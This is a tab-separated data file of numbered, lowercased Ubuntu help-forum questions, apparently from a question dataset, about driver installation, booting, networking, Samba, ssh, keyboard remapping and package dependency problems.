119872	ubuntu 11.10 install 4.4.3-0ubuntu2 package dependencies	before sudo apt-get install gnuplot i sudo apt-get build-dep gnuplot to resolve package dependencies . ~ $ sudo apt-get build-dep gnuplot reading package lists ... done building dependency tree reading state information ... done note , selecting 'liblua5.1-0-dev ' instead of 'liblua5.1-dev' the following packages will be removed : libgd2-xpm ubuntu-desktop the following new packages will be installed : debhelper diffstat html2text intltool-debian libbsd-dev libcairo-script-interpreter2 libcairo2-dev libedit-dev libexpat1-dev libfontconfig1-dev libfreetype6-dev libgd2-noxpm libgd2-noxpm-dev libglib2.0-dev libjpeg62-dev liblua5.1-0-dev libncurses5-dev libpango1.0-dev libpixman-1-dev libpng12-dev libreadline-dev libreadline6-dev libtinfo-dev libwxbase2.8-dev libwxgtk2.8-dev libxcb-render0-dev libxcb-shm0-dev libxft-dev libxrender-dev po-debconf quilt texinfo wx2.8-headers x11proto-render-dev 0 upgraded , 34 newly installed , 2 to remove and 0 not upgraded . need to get 9,100 kb of archives . after this operation , 37.8 mb of additional disk space will be used . it says the `` ubuntu-desktop '' will be removed , but `` ubuntu-desktop '' is important . what 's should i do ?
119873	drivers for dell dimension 8200 desktop ?	i am getting ready to install ubuntu on my dekstop dell dimension 8200 . this is my first experience with ubuntu . do i need to download any additional drivers ?
119882	disable constant user authentication	i 've been using windows for 10 years , and now discovered ubuntu , which is way cooler , but the downside is that i 'm at a complete lost.. so far , so good but what i find annoying is that i have to type my password for every single thing i do , is there a way to disable that ?
119884	avast antivirus for ubuntu ?	will avast work for ubuntu ? i would love to use avast on my ubuntu os . i went to the avast site and it gave me 3 different file download choices for linux . one was a rpm , deb and the other just took me to a page with a bunch of letters and signs ? how do i install new programs using ubtuntu and if avast will not work , what is the best free linux antivirus ?
119889	how to boot with intel gma500 poulsbo graphics	i have a sony vaio netbook with intel gma-500 poulsbo graphics and i 'm trying to boot the latest ubuntu-12.04 beta-2 using a bootable usb . according to this ubuntu-wiki , support for intel gma-500 poulsbo graphics is promising in precise-beta2 and should work out of the box . of course the wiki talks about a problem when booting from usb and states that restarting x using : sudo service lightdm restart will bring a functional graphical desktop , but nothing happens for me ! any help is highly appreciated .
119892	fglrx installation without main monitor	this is a spiritual follow up to this i am doing some modern opengl tutorials and i have found that mesa does not support opengl 3.0+ , so i need to get back to fglrx even if its given me grief in the past . every time i have tried to install fglrx drivers i generally get thrown to the terminal and have to do some recovery , etc . before i can get them to work . problem is , now that my main monitor is borked , when i install fglrx drivers i can not boot to terminal . question : how do i back up my current windowing so that when i ( inevitably ) lost my boot due to fglrx installation , i can recover it with a livecd without reinstalling , and how can i install it without a main monitor ?
119895	screenshot taken automatically during installation	i am not sure what 's happening but while i 'm installing ubuntu , my netbook keeps taking screenshots automatically even when i 'm not pressing anything
119896	ubuntu refuses to change backlight brightness	i 've attempted to change the backlight brightness , by both the keyboard setting and directly in the screen settings . both show that i 've changed the brightness down to minimum neither actually changed the brightness level .
119898	correct way to downgrade samba package	i am running ubuntu server 10.04 lts and i have installed and configured samba 3.4.7 from the repository . what is the correct way to completely and cleanly uninstall this version so that i can install samba 3.0.28 which i have compiled from source ?
119901	how to create a desktop environemt	i want to create a desktop environment for ubuntu and linux can you tell me how to do that i want the best easiest way to do that . can i use qt linux embedded to do that if it is then i want to use that only tell me which library how it can be done using python which packages to download and import i want to work more on main things rather than other things i can use c++ too but adding library to c++ is a big pain especially with ides such as eclipse , net beans if i can do it with qt easily tell the system package
119903	trouble setting up openvpn/vpn	i 'm having trouble setting up a vpn on my vps that 's running ubuntu 11.04 . i 'm been following this guide http : //tipupdate.com/how-to-install-openvpn-on-ubuntu-vps/ i 'm able to start the vpn , but the command it tell 's me to do after i start the vpn does n't work for me . i 've tried it about 5 different way 's and i 'll show you what i get now . : ~ # iptables -a forward -m state -- state related , established -j accept iptables : no chain/target/match by that name . : ~ # iptables -a forward state -- state related , established -j accept bad argument `state' try `iptables -h ' or 'iptables -- help ' for more information . i just ca n't get that to work and the vpn does n't seem to be workign with out it . can someone help me fix this ?
119907	unable to install blockdiag	i am trying to install a python uml tool called blockdiag via this command : sudo easy_install blockdiag i get the following error and am unable to figure out how to fix it . i have received this kind error for the first time and i would appreciate if you would be kind enough to let me also know how to troubleshoot such errors . reading http : //effbot.org/zone/pil-changes-115.htm download error : [ errno -2 ] name or service not known -- some packages may not be found ! reading http : //effbot.org/zone/pil-changes-115.htm reading http : //effbot.org/downloads/ # imaging best match : pil 1.1.7 downloading http : //effbot.org/media/downloads/pil-1.1.7.tar.gz processing pil-1.1.7.tar.gz running pil-1.1.7/setup.py -q bdist_egg -- dist-dir /tmp/easy_install-tx4p54/pil-1.1.7/egg-dist-tmp-f4vgbr warning : '' not a valid package name ; please use only.-separated package names in setup.py _imaging.c:75:20 : error : python.h : no such file or directory in file included from libimaging/imaging.h:14 , from _imaging.c:77 : link to full install log and error
119911	fw400 drive wo n't remount on reboot	problem fw400 external drive will not mount on system reboot . fw cable needs to be disconnected and reconnected post login or boot for the drive to be recognised and mount correctly . drive has no faults , and functions correctly with no errors after it is detected and mounted by system post disconnect and reconnect of the cable . overview using 11.04 , all latest packs/patches/updates installed , disk is a lacie d2 quadra 1tb connecting via fw400 port on main motherboard configuration device : /dev/sdg1 ( device path stays constant ) mount point : /media/simmer-g_ partition type : hpfs/ntfs ( 0x07 ) /etc/fstab configuration # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 /dev/sdc6 / ext2 errors=remount-ro 0 1 # swap was on /dev/sdc1 during installation uuid=aef52866-0a45-42a5-b05c-e935ee40dd7c none swap sw 0 0 /dev/sdb1 /media/simmer-f ntfs nls=iso8859-1 0 0 /dev/sdc5 /media/disk-1 ext2 users , user_xattr , user 0 0 /dev/sda1 /media/simmer-e ntfs nls=iso8859-1 0 0
119913	inaccessible samba share with vscan-clamav	i have set up samba with vscan-clamav and everything seems to be configured properly . however , when i try to access a samba share from windows i get the following error . -- -- -- -- -- -- -- -- -- -- -- -- -- - open folder -- -- -- -- -- -- -- -- -- -- -- -- -- - \\ < share name > is not accessible . you might not have permission to use this network resource . contact the administrator of this server to find out if you have access permissions . a device attached to the system is not functioning . -- -- -- -- -- -- -- -- -- -- -- -- -- - ok -- -- -- -- -- -- -- -- -- -- -- -- -- - when i comment out the following lines in smb.conf , i can access the shares but obviously the real-time virus scanning does not work . vfs object = vscan-clamav vscan-clamav : config-file = /etc/samba/vfs-config/vscan-clamav.conf i have verified that clamav is running properly . i 've also verified the following : vscan-clamav.conf contains clamd socket name = /var/run/clamav/clamd.ctl which does exist . the clamav user has ownership of the /var/run/clamav directory . the clamav daemon is running . what am i missing ?
119928	banshee : sort playlist by track number	banshee has an option - sort playlist by track number , it on do nothing . is at a bug or i miss something ?
119932	notification out of screen	how to solve the problem ? the notifications extrude the screen.anyone could help ?
119934	equivalent of jdiskreport on ubuntu	i have used jdiskreport published by jgoodies to analyse the file size distribution on windows . i am wondering if there is anything that is an equivalent of jdiskreport for ubuntu . i ask this not for finding the file sizes on a particular system , i have used a shell script to find all the file sizes , but i would like to understand the file size distribution in a pictorial format . so that it is easy not only for me to understand but it is easy for me to explain this too . due to my low reputation points i can not post a picture , but i am looking for something like the figure 2 in this link
119949	in gimp , how do i make part of image transparent manually ?	how can i make part of the image transparent ? i tried the `` color to alpha '' option in gimp , but it 's not working . i know in photoshop you can erase the part you do n't like , and make it transparent . does gimp support that ?
119955	why is windows host unknown when pinging , but is resolved by nslookup ?	on my linux host i try to reach the windows host in the lan ( wifi ) . if i try to ping that windows host by its name , i get unknown host . if i query in nslookup , then i get valid ip . vnc also refuzes the host name , but accepts ip . how to make windows host visible by its name ? windows host has dynamic ip .
119957	text editor playing hide and seek	when ever i minimise or alt+tab from the text editor gedit , it disappears from unity and from alt tabbing . i can open a new instance of it from the menu , but all previous work is lost . how can i fix this ?
119966	how do install graphics drivers for radeon hd 6380g on a hp pavilion g6 ?	i installed ubuntu from wubi using a live cd but when i booted i just got a black screen so i followed the instructions from this forum http : //ubuntuforums.org/showpost.php ? p=10089820 & postcount=8 which successfully completed the ubuntu installation but now when i boot ubuntu i just get a command prompt . when i type in startx it comes up with an error . i am told i need to install graphics drivers , how do i do this ? thanks in advance ryan
119969	wireless does not work on ubuntu 10.04 but does work on ubuntu 11.10	i have acer aspire one d257 . the wireless does not work at all when using ubuntu 10.04 . but it works properly when using ubuntu 11.10 ! so how can i make it work with ubuntu 10.04 ? edit : i have upgraded the kernel to version 3.2.0 and still no wireless !
119971	what partition to use to keep data files in ubuntu ?	i have been using ubuntu for a few years and usually my partition set up was the following : ext3 or ext4 partition for the system itself ( 20 gb ) ; a 10 gb swap partition ; a big fat32 partition to store movies , photos , work stuff , etc . ( depends on the capacity of the disk , but usually it is what is left from ext3+swap , currently it is more than 200 gb ) . does this setup sound right ? i am considering to switching to one big ext3 partition now , because the problem with fat32 in ubuntu has not gone anywhere : for example , right now i can access my 'big ' partition with a 'data ' label only through /media/_themes ? end . pretty strange name for a partition , is n't it ? some linux software fail to read/write on this partition . for example , if i want to play around with rebar and build/make/compile things on this fat32 partition , it will always complain about permissions and wo n't work ( the same goes for many other kinds of software ) ; it is not stable , i can not refer to some files on this fat32 partition , because after the next reboot it will be called not '_themes ? end ' , but something else . on the other side i usually begin to run out of space on the ext3 partition after a few months of usage . so , the question is - what is the best setup of partitions for an ubuntu system ? should a fat32 partition be used at all ?
119975	dual boot ubuntu and an ubuntu based distro	i am running ubuntu 11.10 and i would like to install an ubuntu based distro as well . what are the steps in order to complete this operation ? ( resize my 500gb hdd , create the needed partitions like / the swap one , etc ) . could anyone provide detailed information about this ? thanks !
119977	what do the activitywatch and inactivitywatch plugins do ?	i have search on google but i do n't have found anything about the meas of this two plugins : inactivity watch and activity watch . anyone can explain me how it works ? i have tried to activate/deactivate it but i ca n't see anything .
119978	problem with brightness sony vaio nvidia graphics	recently i have installed ubuntu 11.10 on my laptop ( sony vaio vpcf22moe ) . my graphics card is nvidia geforce gt 540m . after ubuntu installation i installed nvidia driver version which is 295.33 . i uninstalled nouveau using : sudo apt-get -- purge remove xserver-xorg-video-nouveau i noticed a few things : my brightness fn keys are not working ( fn+f5 / fn+f6 ) . also in compiz 3d is not working . the brightness is set up to maximum . i have tried almost everything . i have followed other threads and edited in million different ways xorg.conf . xbacklight command in terminal does n't work either . does anybody have any idea how to configure it in order to make it to work ?
119985	where can i find technical documentation for training in ubuntu ?	hello friends as might have documentation , written tests , ubuntu introductory material , to give talks to local users , i 'm from venezuela state falcon , or as part of a dedicated service technician specializing in ubuntu
119987	is it possible to disable auto hide in the global menu ?	is there a way to disable the global menu from automatically hiding in unity ? i would like if the menus behaved in the same way as they did in mac osx .
119989	gnome 3 only displaying a file menu	i just installed gnome shell . only a file menu is being displayed . gnome classic works just fine . can someone help me ? i 'd like to have the gnome 3 user interface . my system specs are : pentium 4 3.0 ghz , 1gb ddr2 ram , intel 82865g with 96 mb video ram and 3d acceleration . here 's a screenshot :
119991	what tablets would be good for running kubuntu active ?	looking at getting a tablet and installing kubuntu active precise daily . which ones would run it best ?
119997	java no longer works after upgrading to 12.04	i 'm trying to run a .jar file on my computer . it worked in version 11.10 , but in 12.04 now , i get a fatal error message from iced tea web , saying it can not parse the jnlp file . i 've tried installing other java clients but had no success , they do n't even appear on the 'open with ' list .
120000	xubuntu wo n't boot	i ca n't properly boot my xubuntu desktop . it just hangs on the console without any visible errors . the only way i can boot it properly is choosing `` recovery mode '' in grub and then selecting `` continue booting '' in recovery menu . it 's really annoying . i provide some logs here : http : //www.sendspace.com/filegroup/mq % 2fzdwvvcrjb3dz4vvqjsw please advise ! if you need some additional information i will be glad to provide it . any hints and support will be much appreciated .
120006	xprograms over ssh , nothing happens	i 'm new to ssh and trying to setup a connection to run xapplications through my school . i made the login perfectly fine but once inside , i export the display to my ip ie : export display=myip:0.0 after that i try to run serveral xapplications for example xterm or firefox , though nothing happens . instead of telling me that it cant reach the display or similar , i get no responce from the terminal , i have to ctrl + c to get back to the prompt . i get the feeling i 'm missing something simple..
120008	how can i allow a user to stream my videos securely ?	i 've got a script that records 10 minute videos from a webcam to video1.mp4 video2.mp4 video3.mp4 video4.mp4 then records over video1 again in rotation . i 'd like one user to be able to view these in winamp or itunes by having a playlist with the four of them on repeat . ( this is my way of getting around the many hours of figuring out how to actually livestream from a webcam with vlc ) . i do n't see any examples of things like icecast being used for video , and i do n't see any mentions of secure streaming . my question is , is there any way to have these videos be seen securely ? i can do things like https on my server , but i do n't have great access to the user 's machine , so just sharing a directory by samba or sshfs is n't much of an option .
120009	how to install gpt fdisk 8.4 in kubuntu 12.04	i 'm using kubuntu 12.04 ( 64bit ) . the ubuntu repos contain gpt fdisk 8.1 which is not the latest . the latest version is 8.4 and it contains some bug fixes i want to have . i downloaded the latest deb package from here : http : //download.opensuse.org/repositories/home : /srs5694/xubuntu_11.10/amd64/gptfdisk_0.8.4-1_amd64.deb when i tried to install it initially , i got an error that dependencies could not be satisfied . so i installed the version from the repos first , then tried to install the latest version over that . now i get the error below . # dpkg -i gptfdisk_0.8.4-1_amd64.deb selecting previously unselected package gptfdisk . ( reading database ... 90031 files and directories currently installed . ) unpacking gptfdisk ( from gptfdisk_0.8.4-1_amd64.deb ) ... dpkg : error processing gptfdisk_0.8.4-1_amd64.deb ( -- install ) : trying to overwrite '/usr/share/man/man8/cgdisk.8.gz ' , which is also in package gdisk 0.8.1-1build1 dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) processing triggers for man-db ... errors were encountered while processing : gptfdisk_0.8.4-1_amd64.deb how can i install 8.4 of gpt fdisk ?
120010	how do i turn on sticky keys from the cli ?	i 'd like turning sticky keys on and off to be done from a script . this is especially helpful to those not using kde/gnome/xfce .
120012	what is 'getty ' ? i noticed there is 6 occurences of it in my system monitor	i 'm just curious what 'getty ' is and what it does . the past few days i have noticed that there is always at least 6 instances of it in system monitor each using about 640kib memory and status says `` n_tty_read '' . please enlighten me to what this means . thank you !
120015	what package is right for my computer ?	i am running on ubuntu 11.10 32 bit , and i am wondering what packages of software i should download ; namely , rpm , deb , or tar gz . i have encountered having to choose from this list while trying to download avast ! internet security and adobe flash player .
120016	2 editors on ubuntu , gedit and kwrite ?	i wanted to know if it 's possible to have 2 text editor on ubuntu . i have gedit already installed but i wan na experiment with krite too . is it possible ?
120022	recover error in downloaded file using wget	i downloaded ubuntu-full dvd of 11.10 about 1.5 gb using wget command in ubuntu 9.4 . unfortunately file downloaded completely , but when i burn to dvd it does n't start.md5sum was incorrect . i checked disk with error checking tool . one error found in splash file.i think now how can i recover image file , so my download does n't waste . thanks in advance .
120024	unable to download necessary plugins to play music , video or download applications	i recently installed ubuntu 11.10 and i 'm kinda new to linux . i was just trying to do basic stuff like playing music , video using banshee media player , but then it ask me to search for plugins and install it . i 've done that , but still does n't work . it actually does n't download them at all . whats the problem ? anyone help ?
120025	unable to remove the lock by normal means	i 've been installing ubuntu restricted extras via the software center . everything was going well at first , but then the installation process froze on 'applying changes ' stage . i 've had this in the past already , and usually just hitting the 'cancel ' button helped , but not this time . obviously , the install process has placed a lock , and i could n't issue any apt-get commands . then i 've tried doing what was suggested here fixing could not get lock /var/lib/dpkg/lock : sudo fuser -cuk /var/lib/dpkg/lock ; sudo rm -f /var/lib/dpkg/lock but it seemed to me that it has only killed my x server . okay , i 've just pressed the power button on my pc , and restarted , hoping that the lock was finally off and i could reinstall the stuff . no dice . when i open the software center , i still have one operation in process , a weird one : `` searching | cancelling `` . the 'cancel ' button is either inactive , or it just does nothing . so i 've become desperate and decided to write here . how do i fix the problem ? ca n't install anything on a fresh ubuntu 12.04 : ) thanks in advance
120043	hebrew subtitles are gibberish	i tried adding subtitles to a video with gsubedit ( gnome subtitles ) , but it 's showing the subtitles as gibberish and also i opened the file and saw there gibrish . i used the subtitle also in windows there they were in hebrew , how can i make ubuntu show my subtitles in hebrew ? thanks for helping ! ( :
120050	jquery website is not opening in ubuntu but in xp , everything is fine	i know it is weird , but i just discovered this , jquery.com is not opening in my ubuntu firefox or other kde browser and hence many sites that copy codes from code.jquery.com also hanged . is there any solution to this problem . i have found the problem it is actually with the dns servers i am using , google dns , 8.8.8.8 and 8.8.4.4 , whenever i use these dns in ubuntu my system stop responding to some sites , actually they are connected nicely , but the request end up in waiting.. i dont understand why ... ? ? ? i checked my dns with cat /etc/resolv.conf even after using google dns , it is showing dns servers i received automatically after connecting to the service provider . i am connecting using network manager , not using dns i provided but using the default one . any solution ? ? have just found the solution ... but will test it for sometime to check if it is permanent.. i found this post http : //ubuntuforums.org/showpost.php ? p=11722053 & postcount=16 and follow the instructions . echo 'manual ' | sudo tee /etc/init/resolvconf.override sudo rm /etc/resolv.conf and then with sudo kate i created new /etc/resolve.conf with contents.. nameserver 8.8.8.8 nameserver 8.8.4.4 nameserver 127.0.0.1 and then deleted all my network manager connections and then created 2 new dsl connections one with simple configuration and other with automatic ( pppoe ) and 2nd with automatic ( pppoe ) address only with dns servers ( may the settings of dnsmasq ) set to 8.8.8.8,8.8.4.4 . now resolv.conf and nm both have same dns and at least for now everything is working fine .
120059	how can i get my microphone to work	i ca n't get my microphone working on ubuntu 11.10 , i tried all the hardware profiles in the audio settings . without any success . i am sure that i do n't have any issue with my mic or input since i have dual boot and i got it working on windows .
120060	unable to wake display with remote	i 'm running an htpc ( xbmc ) without a keyboard/mouse attached , running oneiric . after some indeterminate amount of time , sometime between 1 and 12 hours , the display goes to sleep . the computer itself is not sleeping , i can still ssh to it from another computer . the remote will not wake the display . the ir receiver is working , as irw will show me the remote key presses . the only way to get my display back is to restart the display manager , lightdm in this case . does anybody know a way to keep the display from going to sleep ? i do n't really need any power management at all considering that it connects to my tv and when i want my display to go to sleep , i turn off my tv .
120064	xmodmap modifications are n't enough - anything else i can do ?	i 'm using an apple keyboard which has some annoyances compared to other keyboards . namely , the alt_l and super_l keys are swapped , and the bar and less keys are swapped ( `` | '' and `` < `` ) . i 've written an xmodmap file to swap the keys back : keycode 49 = less greater less greater onehalf threequarters keycode 64 = super_l nosymbol super_l keycode 94 = bar section bar section brokenbar paragraph keycode 108 = super_r nosymbol super_r keycode 133 = alt_l meta_l alt_l meta_l keycode 134 = alt_r meta_r alt_r meta_r i did this by identifying the keys using xev and the default modmap xmodmap -pke and swapping the keycodes . xev now identifies all my keys as correct , which is awesome ! i can also use the correct keys to type the bar and less than symbols . ( i followed this answer on askubuntu : how do i remap certain keys ? ) but it seems the change is n't very deep . here are some examples the super key is now broken in the compiz settings manager . no shortcuts involving the super key works ( but the alt key does ) . the settings dialog for gnome do does n't heed the changes in xmodmap , and i ca n't open the gnome do window anymore if i use any of the remapped keys . chrome shortcuts does n't care about the xmodman changes , i now have to use super+d to focus the address field ( should be alt+d ) so to summarize , everything broke . i would like a deeper way of telling ubuntu ( or any other linux distro for that matter ) which keys are which on the keyboard . is there a way to edit the keyboard layout directly ? i 'm using the norwegian bokm책l keyboard layout . does it reside in a file somewhere i could edit ? any comments , previous experiences or relevant stray thoughts would be greatly appreciated - thanks
120065	how to recover password	i just bought a used computer with ubuntu . it has a user name and password and other user . is there a way to sign in to use it ? i 'm trying to locate the past owner to find out the password .
120074	java association	i have recently upgraded to 12.04 and i am using gnome classic . i want to run a .jar file by simply double clicking it . how would i go about doing this ? i have openjdk 6 installed .
120075	instalar o ubuntu / install ubuntu	i installed ubuntu 10.10 alongside windows 7 . i was able to upgrade to version 11.04 . now i 'm trying to update to version 11.10 but i get an error message saying it is not possible to upgrade . i decided to install a partition , but when i start the pc i do n't get a grub screen that lets me choose which os to boot . i formatted the partition where i installed ubuntu , i 've been looking for tutorials where you learn how to install ubuntu on a partition part to try to understand the problem . i wonder if anyone can explain how to install ubuntu on a partition an existing partition , so that when i boot the pc i see the grub menu that lets me choose which system i want to start .
120077	how to copy from a pdf to another pdf in ubuntu/linux	so preview for mac os x has this capability . i want to be able to just highlight whatever on a pdf , and be able to copy and paste immediately into another pdf file ( via the clipboard ) . i do a lot in latex , and this would really make things easier why texing in ubuntu/linux .
120079	is it possible to run a command on the client when a ssh session is closed ?	i know that i can run a local command when i establish a ssh connection , something which is quite useful for setting up terminal title for example . still , i 'm looking for a solution to run a command when the ssh connection is closed . usage : > ls > ssh server2 # want to run something here on the client , this can be done with .ssh/config proxycommand > ls > exit # i want to run something on the client , how ! ? > ls
120082	how to install windows as my second boot ( ubuntu 11.10 ) ?	i have an asus 1215n netbook ( no cd drive ) , currently running ubuntu 11.10 . it 's all working great , but time comes when the man needs some retro gaming , and well ... i need a windows on the same machine now . i 've tried winusb and creating a bootable usb using a friend 's windows machine , both failed . i have managed to boot from the usb but the windows installer keeps telling me it 's lacking drivers ( which is not true , because i have installed windows from that .iso on a different pc on a different occasion ) or would n't recognize my hard drive . none of the answers i 've found on the forum so far seem to be quite relevant . it just seems like i 'm stuck with ubuntu 11.10 , and according to what a lot of the answers to similar problems suggest , the best way to go about that would be to install windp
120085	starting compiz from the command line	i am making a custom session ( using .xsession ) and i want to use compiz . when i use the compiz or compiz -- replace command in the .xsession and also using `` recovery console '' option , it seems to not load any plugins . after starting compiz , i start ccsm and no plugins are loaded . back when i used arch there were a bunch of arguments for compiz and i would use 3 or so , and one of them told compiz to load settings from my config at launch . here is the compiz -- help from ubuntu 12.04 : usage : compiz [ options ] [ plugins ... ] options : -- replace replace any existing window managers -- display display connect to x display display ( instead of $ display ) -- sm-disable disable session management -- sm-client-id id session management client id -- keep-desktop-hints retain existing desktop hints -- sync make all x calls synchronous -- debug enable debug mode -- version show the program version -- help show this summary those are also the only options under man compiz here 's the thing : when i run compiz -- replace under the unity session , plugins load alright and all that good stuff . when i run that under my session , compiz loads nothing . info that may help : i have tried compiz -- replace gconf i always have gnome-settings-daemon running i am using ubuntu 12.04 ( beta release )
120087	amd64 slower than i686 ?	hm ... i installed 12.04 b1 before it promptly crashed and corrupted my drive , but before that , it seemed much slower than a 32-bit version of 11.10 which i installed before . i bought a new drive , and installed 11.10 amd64 on it , and again it seemed much slower that i686 . why ? oh and it 's a persistent flash drive i installed the ubuntu oss on . is n't it the computer 's cpu that does all the processing ? is it the fact that the load of 64 bits is too much and 32 bits are lighter to transfer to the computer 's cpu ? i have a intel celeron something 64-bit cpu .
120096	ubuntu hangs at purple screen	i installed ubuntu 11.10 today . after the reboot i selected ubuntu and it kept hanging at the purple screen . no error message was shown . the livecd went fine and the installation was successful . i tried recovery mode but it still did n't work please help ! any help will be appreciated specs : asus f81se , windows 7 home premium , ati radeon 512mb graphics card , 4gb ram
120100	setting the icon for my mime type	i 've added my mime type to ubuntu by the .deb package . i made this file for sharedmimeinfo : http : //paste.ubuntu.com/920693/ ( i know the first row is wrong ) i ca n't see the icon for my extension how can i do ? how can i set it and how can i made my .deb to copy my icon in the icons folder ? do my icon need particular settings/format ?
120101	can not boot , how to recover	am running 11.10 64-bit with gnome-shell . something happened late friday whereby my machine never gets to the login screen . i do get to an ubuntu splash logo , after that i get a text screen that it hangs on . the screen is referring to issues with mounting various network resources , including vmware and also some references to my nas that are in fstab . if i hit `` esc '' i can get to the grub menu and into recovery console . if i try to do a file system check , i run into a similar error screen that i see when trying to boot normally . a possible clue here is that during my last good session i made some mods to the /etc/hosts file to reference another system which i 'm connecting to with synergy . i do n't believe i have hardware issues as i 'm able to boot properly with a live usb and connect to my network/internet . a few more tidbits . i have regular dejadups backups on my nas . i have a good clonezilla whole drive image which is 4-6 weeks old.. my home is encrypted . i thought i 'd try blowing away my hosts file via live usb , but when i mounted the hard drive everything was read-only and i could n't figure out how to replace it . p.s . i logged in via cli and modded the host file to remove the entry i 'd made , to no avail . system continue to gets stuck on the following : cifs vfs : default security mechanism requested . the default security mechanism will be upgraded from ntlm to ntlmv2 in kernel version 3.1s would love some sober advice on how to attack this .
120109	why does unity and unity 2d use different config systems ? ( dconf and gconf )	unity 3d uses gconf , but unity 2d uses dconf . why is that and is there an overview of where the different parts of unity ( scopes , lenses , etc ) are stored in which configuration system ?
120114	how do i remove the video lens ?	how do i remove the video lens in unity 12.04 ?
120117	how do i force the native screen resolution of my display if it 's not offered using fglrx driver ?	my computer model is dell studio 1555 : pentium dual core t4300 ( 2.1ghz,800mhz,1mb ) , 4096mb 800mhz ddr2 dual channel , 512 mb ati mobility radeon hd 4570 using the ati proprietary driver . my screen resolution is 1366x768 ( 16:9 ) . this problem has been identified on ubuntu 11.10 and 12.04 i recently acquired an lg - l203wt monitor but i 've found that i ca n't get the maximum resolution out of it - 1680x1050 , which is 16:10 ratio . the settings in display show the maximum resolution i can achieve as 1440x900 this is also shown in amd catalyst control centre the resolution has to be be 16:10 ratio for it to work , so choosing a 16:9 resolution does n't work . as i 'm using the proprietary driver using xrandr wont work , so is there any other way to get the maximum resolution of 1680x1050 with the fglrx driver ?
120121	how to install windows 7 after ubuntu ?	i installed ubuntu to see what it is.. well i saw and its far to complicated and annoying to me.. or maybe i just looked at it wrong i m still open for ideas.. but i tried to install w7 and when i got to choose the partition select it says that it can install w7 only on ntfs disc and i have some other type.. what is it and how can i change it ?
120143	macbook pro 8.1 ( 13 '' ) wifi issues	i know that this has been asked before but i have a problem connecting . i 've installed all updates and ubuntu 11.10 through uefi on my macbook pro ( no mbr booting ) . i 've gotten the wifi card recognised and to see networks but when i select mine it tries to connect but constantly asks for my password over and over again . i used ubuntu 's help guide to install 11.10 on this macbook i got everything else working except for the wifi .
120147	ca n't mount usb : `` not authorized ''	since three months i am waiting and searching for a solution to mount a usb stick again . i am using ubuntu 11.10 32bit and 64bit dell machines and i could not really find a useful answer what exactly i need to do being able to mount a usb stick . unable to mount [ volumename ] not authorized can you please point me in the right direction what i need to do/change/adjust being able to mount a usb device again ?
120151	ntfs volume recognised as `` unallocated space '' but works with windows	moving to ubuntu , i have a drive with windows on a drive with ubuntu on and 4 other ntfs drives 3 of which appear fine in both systems 1 however works fine on windows ( single ntfs volume ) but in ubuntu the drive appears in the disk utility with a 134 mb `` microsoft reserved partition '' and 2tb of unallocated space is there any way i can get this volume to be mounted in ubuntu with out moving all my data to another driver formatting and then moving back again
120153	how to change `` read-only '' file at root prompt	after blank screen , need to change some settings in xorg.conf logged in at root prompt through recovery mode . unable to change file read-only message . how to change the file ? thanks .
120163	increase screen resolution with vga intel gma 3150	is there any way to increase the aspect ratio resolution netbook with intel gma 3150 chipset from 1024x600 to be larger than 1280 ? i use ubuntu precise beta 2
120177	environment variable blank inside application	i have an environment variable that i 've set in ~/.profile with the following line : export appdir=/path/to/dir when i log in and load up a terminal , i can verify that the variable is set : $ printenv appdir /path/to/dir i 'm trying to access this variable from within a qt application : qstring appdir = getenv ( `` appdir '' ) ; qtwarning ( `` dir : | '' + appdir + `` | '' ) ; the warning window that pops up shows me : dir : || what is going on here ? am i misunderstanding about how environment variables work in ubuntu ? this is with a c++/qt app on ubuntu 11.10 x86 .
120190	how would i pin a .jar file to the taskbar in unity display	how would i make it so that i can run a .jar file from the task bar on the side in unity . as it is i can not drop a .jar file onto it . how would i create something that i could pin to the task bar that would link into running the .jar . just in case you need to know i am trying to put minecraft onto the task bar and i can not seem to correctly make a desktop file to link to it .
120204	xrdp : how to get remote terminal services without local user login ?	i just installed xrdp ( remote desktop ) and i realise it works great , except 1 problem . when the machine reboots i have to redo the local user login on the machine to start the service . ideally i 'd like to just have the login screen show up meanwhile a process runs the service in the background . i 'd like to disconnect the mouse and keyboard and leave it running so i can connect to it when necessary , not needing the keyboard and mouse every time the machine reboots . does anyone know how i can achieve this ? i 'm using ubuntu 10.10
120206	encrypted home ... forgotten password , but no passphrase	i am using a cloned hard drive in attempts to restore some old files . the cloned drive has 2 users , one with an encrypted home drive , one without . both are administrators . when i could n't get into the main user ( with the encrypted home directory ) , i logged in as the 2nd user and changed the password . it seems that i somehow broke the relationship between the encryption passphrase and the user . i 'm pretty sure i have the passphrase . is there a way to get to the data ?
120209	precise beta 2 : screen wo n't power down	i am running precise beta 2 on a dell latitude e6410 with nvidia graphics . i have set up the power management to turn the screen off after 10 mins of inactivity . instead of it turning off , it simply goes blank ( it 's black , but the screen is still on ) . i 'm not sure why this is happening . xset -q shows : screen saver : prefer blanking : yes allow exposures : yes timeout : 0 cycle : 0 colors : default colormap : 0x20 blackpixel : 0 whitepixel : 16777215 font path : /usr/share/fonts/x11/misc , /usr/share/fonts/x11/type1 , built-ins dpms ( energy star ) : standby : 0 suspend : 0 off : 0 dpms is enabled monitor is on i do not have a screensaver set up ( in fact i do n't even have the option under system settings ) .
120216	how do i get klips or netkey on 11.10 server ?	i 'm attempting to run openswan on my ubuntu11.10 server . all i 've done so far is install openswan from the package manager and attempt to set up conf files . however , ipsec support seems to be broken , thus openswan ca n't do it 's thing . attempt to start ipsec $ sudo ipsec setup -- start ipsec_setup : starting openswan ipsec 2.6.28 ... ipsec_setup : no klips support found while requested , desperately falling back to netkey ipsec_setup : even netkey support is not there , aborting verify ipsec $ sudo ipsec verify checking your system to see if ipsec got installed and started correctly : version check and ipsec on-path [ ok ] linux openswan u2.6.28/k ( no kernel code presently loaded ) checking for ipsec support in kernel [ failed ] checking that pluto is running [ failed ] whack : pluto is not running ( no `` /var/run/pluto/pluto.ctl '' ) checking for 'ip ' command [ ok ] checking for 'iptables ' command [ ok ] opportunistic encryption support [ disabled ] ipsec version $ sudo ipsec version linux openswan u2.6.28/k ( no kernel code presently loaded ) see `ipsec -- copyright ' for copyright information . linux build : $ uname -a linux metabox 2.6.18-028stab092.1 # 1 smp wed jul 20 19:47:12 msd 2011 x86_64 x86_64 x86_64 gnu/linux how can i go about correcting this problem with ipsec ? this is a hosted vps , and i 'd like to avoid a kernel rebuild if i can find some other alternative .
